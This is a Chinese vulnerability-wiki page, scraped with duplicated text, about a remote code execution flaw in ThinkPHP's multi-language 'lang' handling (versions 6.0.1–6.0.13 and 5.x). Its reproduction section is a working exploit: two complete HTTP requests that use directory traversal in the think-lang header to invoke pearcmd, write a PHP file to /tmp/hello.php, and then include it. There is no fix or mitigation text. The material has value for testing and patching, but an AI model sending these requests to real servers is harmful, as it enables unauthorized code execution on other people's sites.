fofamini-wiki

登录白背景

源码

thinkphp 6.x版本lang存在命令执行漏洞

一、漏洞简介

ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。当特定版本的ThinkPHP开启多语言功能，并且存在扩展pear时，攻击者可以构造lang参数实现远程代码执行。

二、影响版本

6.0.1 <= ThinkPHP <= 6.0.13
ThinkPHP 5.0.x
ThinkPHP 5.1.x

三、资产测绘

特征

四、漏洞复现

GET /public/index.php?+config-create+/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
think-lang:../../../../../../../../usr/local/lib/php/pearcmd
Connection: close
Cookie: think_lang=zh-cn
Upgrade-Insecure-Requests: 1

GET /public/index.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
think-lang:../../../../../../../../tmp/hello
Connection: close
Cookie: think_lang=zh-cn
Upgrade-Insecure-Requests: 1

原文: https://www.yuque.com/xiaokp7/ocvun2/pbgpo8ixvv8sim1d

# thinkphp 6.x版本lang存在命令执行漏洞

# 一、漏洞简介
ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。当特定版本的ThinkPHP开启多语言功能，并且存在扩展pear时，攻击者可以构造lang参数实现远程代码执行。

# 二、影响版本
+ 6.0.1 <= ThinkPHP <= 6.0.13
+ ThinkPHP 5.0.x
+ ThinkPHP 5.1.x

# 三、资产测绘
+ 特征

![1729962769204-e01e3d04-cf79-43d3-a299-ed53becfa17a.png](./img/QPKgnXfXyBV6NiP-/1729962769204-e01e3d04-cf79-43d3-a299-ed53becfa17a-280917.png)

# 四、漏洞复现
```plain
GET /public/index.php?+config-create+/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
think-lang:../../../../../../../../usr/local/lib/php/pearcmd
Connection: close
Cookie: think_lang=zh-cn
Upgrade-Insecure-Requests: 1
```

![1729962797048-e48daaec-64c6-44f4-b399-e83ad5a55968.png](./img/QPKgnXfXyBV6NiP-/1729962797048-e48daaec-64c6-44f4-b399-e83ad5a55968-309810.png)

```plain
GET /public/index.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
think-lang:../../../../../../../../tmp/hello
Connection: close
Cookie: think_lang=zh-cn
Upgrade-Insecure-Requests: 1
```

![1729962837934-93bc8cd8-8c80-4f2e-b3f7-dc87989f69e3.png](./img/QPKgnXfXyBV6NiP-/1729962837934-93bc8cd8-8c80-4f2e-b3f7-dc87989f69e3-995331.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pbgpo8ixvv8sim1d>

fofamini-wiki

thinkphp 6.x版本lang存在命令执行漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

三、资产测绘

四、漏洞复现